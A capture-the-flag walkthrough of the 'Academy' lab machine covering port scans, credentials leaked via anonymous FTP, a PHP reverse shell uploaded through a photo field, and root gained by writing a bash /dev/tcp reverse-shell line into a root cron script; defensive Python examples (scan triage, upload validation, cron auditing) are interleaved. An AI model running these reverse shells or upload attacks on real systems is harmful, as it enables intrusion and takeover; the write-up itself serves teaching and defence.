Walkthrough
Gaining a Foothold
Nmap
192.168.88.133
┌──(root㉿kali)-[~]
└─# nmap -p- -A -T4 192.168.88.133
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-02 02:31 EDT
Nmap scan report for 192.168.88.133
Host is up (0.00087s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 1000 1000 776 May 30 2021 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.88.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 c7:44:58:86:90:fd:e4:de:5b:0d:bf:07:8d:05:5d:d7 (RSA)
| 256 78:ec:47:0f:0f:53:aa:a6:05:48:84:80:94:76:a6:23 (ECDSA)
|_ 256 99:9c:39:11:dd:35:53:a0:29:11:20:c7:f8:bf:71:a4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:12:8A:DE (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.87 ms 192.168.88.133
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.52 seconds
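Everything that follows in the walkthrough is built on this one scan, so it is worth being able to read it mechanically. As an added example (not part of the original write-up and not nmap's own code), here is a small Python parser for nmap's normal output that pulls out open ports, versions and NSE script results, then applies a few triage rules a defender would check first: anonymous FTP with the files it exposes, a plaintext FTP control channel, and a default web page. The embedded input is an excerpt of the scan above; the parser, the `Port` class and the `triage` rules are my own.

```python
import re
from dataclasses import dataclass, field

# Excerpt of the nmap scan shown above. Copy/paste collapsed nmap's indentation;
# the parser only relies on the leading "|" of script lines, so that is fine.
SCAN_OUTPUT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 1000 1000 776 May 30 2021 note.txt
| ftp-syst:
| STAT:
| Control connection is plain text
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|_ 256 99:9c:39:11:dd:35:53:a0:29:11:20:c7:f8:bf:71:a4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:12:8A:DE (VMware)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# An NSE script result starts with "| name:" or "|_name:". Names are lower-case,
# so sub-lines such as "STAT:" are kept as continuation text of the current script.
SCRIPT_RE = re.compile(r"^\|_?\s*([a-z][a-z0-9-]*):\s*(.*)$")


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str = ""
    scripts: dict = field(default_factory=dict)  # script name -> list of output lines


def parse_nmap(text):
    """Parse nmap normal output into {port_number: Port}."""
    ports = {}
    current = None
    last_script = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = Port(int(m.group(1)), m.group(2), m.group(3), m.group(4),
                           (m.group(5) or "").strip())
            ports[current.number] = current
            last_script = None
            continue
        if current is None or not line.startswith("|"):
            current = None  # left the per-port block (MAC Address, OS details, ...)
            continue
        m = SCRIPT_RE.match(line)
        if m:
            last_script = m.group(1)
            current.scripts.setdefault(last_script, []).append(m.group(2))
        elif last_script is not None:
            # Continuation line of the previous script (file listings, host keys, STAT output)
            current.scripts[last_script].append(line.lstrip("|_ "))
    return ports


def triage(ports):
    """Findings a defender would act on first; returns (port, description) pairs."""
    out = []
    for p in ports.values():
        anon = p.scripts.get("ftp-anon", [])
        if any("Anonymous FTP login allowed" in v for v in anon):
            # Lines after the verdict are the directory listing; last field is the file name.
            files = [v.split()[-1] for v in anon[1:] if v.startswith("-")]
            out.append((p.number, "anonymous FTP login allowed, exposes: " + ", ".join(files)))
        if any("plain text" in v for v in p.scripts.get("ftp-syst", [])):
            out.append((p.number, "FTP control and data channels are plaintext"))
        if any("Default Page" in v for v in p.scripts.get("http-title", [])):
            out.append((p.number, "default web page served, server not yet configured"))
    return out


if __name__ == "__main__":
    parsed = parse_nmap(SCAN_OUTPUT)
    for port in sorted(parsed):
        print(f"{port}/{parsed[port].proto} {parsed[port].service} {parsed[port].version}")
    for port, finding in triage(parsed):
        print(f"  [{port}] {finding}")
```

The same rules map directly onto remediation: anonymous FTP and the note.txt it exposes are the entry point of this whole box, and the plaintext control channel means any non-anonymous FTP login would cross the wire unencrypted.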
Port 22
Interesting items:
SSH
OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
Port 21
Interesting items:
FTP vsftpd 3.0.3
ftp-anon: Anonymous FTP login allowed (FTP code 230)
-rw-r--r-- 1 1000 1000 776 May 30 2021 note.txt
FTP server status: Connected to ::ffff:192.168.88.129; Logged in as ftp; TYPE: ASCII; No session bandwidth limit; Session timeout in seconds is 300; Control connection is plain text; Data connections will be plain text; At session startup, client count was 3; vsFTPd 3.0.3 - secure, fast, stable
Port 80
Interesting items:
HTTP
80/tcp open http Apache httpd 2.4.38 ((Debian))
http-server-header: Apache/2.4.38 (Debian)
http-title: Apache2 Debian Default Page: It works
Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation
https://www.exploit-db.com/exploits/46676
HTTP Request Smuggling attack
Apache HTTP Server privilege escalation from modules' scripts (CVE-2019-0211)
mod_ssl access control bypass (CVE-2019-0215)
https://httpd.apache.org/security/vulnerabilities_24.html
Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) (CVE-2021-42013)
https://httpd.apache.org/security/vulnerabilities_24.html
/icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
/phpmyadmin/: phpMyAdmin directory found.
/phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
Nikto
┌──(root㉿kali)-[~]
└─# nikto -h http://192.168.88.133
- Nikto v2.5.0
- Target IP: 192.168.88.133
- Target Hostname: 192.168.88.133
- Target Port: 80
- Start Time: 2023-11-02 02:37:37 (GMT-4)
- Server: Apache/2.4.38 (Debian)
- /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
- /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
- No CGI Directories found (use '-C all' to force check all possible dirs)
- /: Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 5c37b0dee585e, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
- Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
- OPTIONS: Allowed HTTP Methods: OPTIONS, HEAD, GET, POST .
- /phpmyadmin/changelog.php: Cookie goto created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
- /phpmyadmin/changelog.php: Cookie back created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
- /phpmyadmin/changelog.php: Uncommon header 'x-ob_mode' found, with contents: 1.
- /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
- /phpmyadmin/: phpMyAdmin directory found.
- /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. See: https://typo3.org/
- 8254 requests: 0 error(s) and 12 item(s) reported on remote host
- End Time: 2023-11-02 02:37:50 (GMT-4) (13 seconds)
- 1 host(s) tested
Default Web Page
Readme files exposed
Information Disclosure
404 - Information Disclosure
Server Header - Information Disclosure
/phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. See: https://typo3.org/
phpMyAdmin version 4.9.7, backed by MySQL
Login credentials exposed in note.txt (readable over anonymous FTP):
login: 10201321
password hash: cd73502828457d15655bbd7a63fb0bc8
password: student
Exposed admin credentials in config.php
Logged in as 10201321:student
Student login page at 192.168.88.133/academy
Any file, not just an image, can be uploaded as the profile photo in Student Registration (under My Profile)
Exploitation
PHP reverse shell uploaded instead of a photo in Student Registration
Edited the PHP reverse shell to point at the attacker machine, then started a listener on the attacker machine
https://pentestmonkey.net/tools/web-shells/php-reverse-shell
Reverse shell saved and edited
Listener set up on the attacker machine and the reverse shell uploaded in Student Registration.
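The foothold above exists because the profile-photo upload accepts any content and stores it under the name the client chose, so a file ending in .php lands where the web server will execute it. As an added example, not code from the Academy application, here is a Python sketch of that weak pattern beside a hardened validator: the hardened version sniffs the real image type from magic bytes, requires the declared extension to agree, caps the size, and generates the stored name on the server so no client input reaches the filesystem. The function names, the `uploads/` directory and the 2 MB cap are assumptions for the example.

```python
import os
import secrets

MAX_BYTES = 2 * 1024 * 1024  # assumed size cap for a profile photo

# Magic bytes of the only content types a profile photo may have.
SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


class UploadRejected(ValueError):
    """Raised when an upload fails validation; the caller returns an error to the user."""


def sniff_image_type(data):
    """Return 'png', 'jpg' or 'gif' from the file's leading bytes, else None."""
    for magic, ext in SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None


def vulnerable_store_name(filename, data):
    """The weak pattern behind the foothold above: the client's filename decides the
    stored name (and so the extension the web server dispatches on), and the content
    is never inspected, so a .php upload is saved as executable code in the web root."""
    return os.path.join("uploads", filename)


def hardened_store_name(filename, data, max_bytes=MAX_BYTES):
    """Accept only real PNG/JPEG/GIF bytes whose declared extension agrees, and
    return a server-generated name. Raises UploadRejected otherwise."""
    if len(data) > max_bytes:
        raise UploadRejected("file too large")
    ext = sniff_image_type(data)
    if ext is None:
        raise UploadRejected("content is not a PNG, JPEG or GIF image")
    declared = os.path.splitext(os.path.basename(filename))[1].lower().lstrip(".")
    if declared == "jpeg":
        declared = "jpg"
    if declared != ext:
        raise UploadRejected(f"declared extension '.{declared}' does not match {ext} content")
    # The stored name never contains client input: no path separators, no double
    # extensions, no .php/.phtml/.phar that a server script handler would run.
    return os.path.join("uploads", f"{secrets.token_hex(16)}.{ext}")


def is_accepted(filename, data):
    """Convenience wrapper: True if the hardened check would store the file."""
    try:
        hardened_store_name(filename, data)
        return True
    except UploadRejected:
        return False


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32          # constructed PNG header
    php = b"<?php echo 'hello'; ?>\n"                    # constructed non-image content
    print("weak:    ", vulnerable_store_name("shell.php", php))
    print("hardened:", hardened_store_name("photo.png", png))
    for name, data in (("shell.php", php), ("photo.png", php), ("photo.jpg", png)):
        print(f"hardened rejects {name!r}: {not is_accepted(name, data)}")
```

Validation alone is the second line of defence. The first is deployment: keep the upload directory outside the document root, or serve it with script handlers disabled, so that even a file that slips past the check is returned as bytes and never executed.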
Privilege escalation
Linpeas
Downloaded linpeas.sh on the attack machine and transferred it to the target machine by hosting it on a web server and fetching it from the target with a get command
phpMyAdmin and other credentials exposed
ssh grimmie@192.168.137.129
My_V3ryS3cur3_P4ss
Pspy
Ran pspy64 on grimmie@academy to confirm that backup.sh runs every minute
Bash Reverse Shell
Edit the content of backup.sh to contain "bash -i >& /dev/tcp/192.168.137.128/8081 0>&1"
Gained root access after listening on port 8081
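The root shell above comes from a single misconfiguration: a cron job running as root executes a script that an unprivileged user is allowed to modify. As an added example (not from the write-up, and not linpeas or pspy code), here is a Python audit for that condition. It parses /etc/crontab-style entries (time spec, user, command), resolves the script each command runs, and reports scripts that are not owned by a trusted uid, are group- or world-writable, sit in a world-writable directory, or do not exist at all. The `demo()` function builds a constructed fixture in a temporary directory: a `backup.sh` with mode 777, a correctly permissioned `good.sh`, and a missing script; the file names and crontab lines are mine.

```python
import os
import re
import shutil
import stat
import tempfile

# System crontab line: five time fields (or an @keyword), then the user, then the command.
CRON_LINE = re.compile(r"^(?:@\w+\s+|(?:\S+\s+){5})(\S+)\s+(.*)$")
INTERPRETERS = {"sh", "bash", "dash", "python", "python3", "perl"}


def command_script(command):
    """Return the script path a cron command runs, or None for inline commands."""
    tokens = command.split()
    if not tokens:
        return None
    if os.path.basename(tokens[0]) in INTERPRETERS and len(tokens) > 1:
        return tokens[1]          # "/bin/bash /path/script.sh" -> the script
    return tokens[0] if tokens[0].startswith("/") else None


def parse_system_crontab(text):
    """Yield (user, command) pairs; skips blanks, comments and VAR=value lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        m = CRON_LINE.match(line)
        if m:
            yield m.group(1), m.group(2)


def audit_script(path, trusted_uids=(0,)):
    """Describe why a script run from cron could be controlled by a non-trusted user."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return [f"{path}: referenced by cron but does not exist"]
    problems = []
    if st.st_uid not in trusted_uids:
        problems.append(f"owned by uid {st.st_uid}, not a trusted uid")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        problems.append("group- or world-writable")
    pst = os.stat(os.path.dirname(path) or "/")
    if pst.st_mode & stat.S_IWOTH and not pst.st_mode & stat.S_ISVTX:
        problems.append("parent directory is world-writable without the sticky bit")
    return [f"{path}: {p}" for p in problems]


def audit_crontab(text, trusted_uids=(0,)):
    """Run audit_script over every script a crontab executes; returns finding strings."""
    findings = []
    for user, command in parse_system_crontab(text):
        script = command_script(command)
        if script is None:
            continue
        for problem in audit_script(script, trusted_uids):
            findings.append(f"[runs as {user}] {problem}")
    return findings


def demo():
    """Constructed fixture: a root cron job running a script anyone can edit."""
    root = tempfile.mkdtemp()
    try:
        backup = os.path.join(root, "backup.sh")
        good = os.path.join(root, "good.sh")
        for p in (backup, good):
            with open(p, "w") as f:
                f.write("#!/bin/bash\necho backup\n")
        os.chmod(backup, 0o777)   # group and others may rewrite what root will execute
        os.chmod(good, 0o755)
        crontab = f"""# constructed /etc/crontab-style entries
SHELL=/bin/bash
* * * * * root {backup}
*/5 * * * * root /bin/bash {good}
@reboot root /nonexistent/run.sh
"""
        # The fixture files are owned by whoever runs this script, so that uid is
        # trusted here; on a real host keep the default (uid 0 only) so that a script
        # owned by an ordinary user, as in the walkthrough, is itself a finding.
        return audit_crontab(crontab, trusted_uids=(0, os.getuid()))
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

On a real host, point `audit_crontab` at /etc/crontab and each file in /etc/cron.d; the fix for every finding is the same: the script and its directory are owned by root and writable only by root, or the job is removed.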
Video
When you click the link below, it will start from the Academy Walkthrough.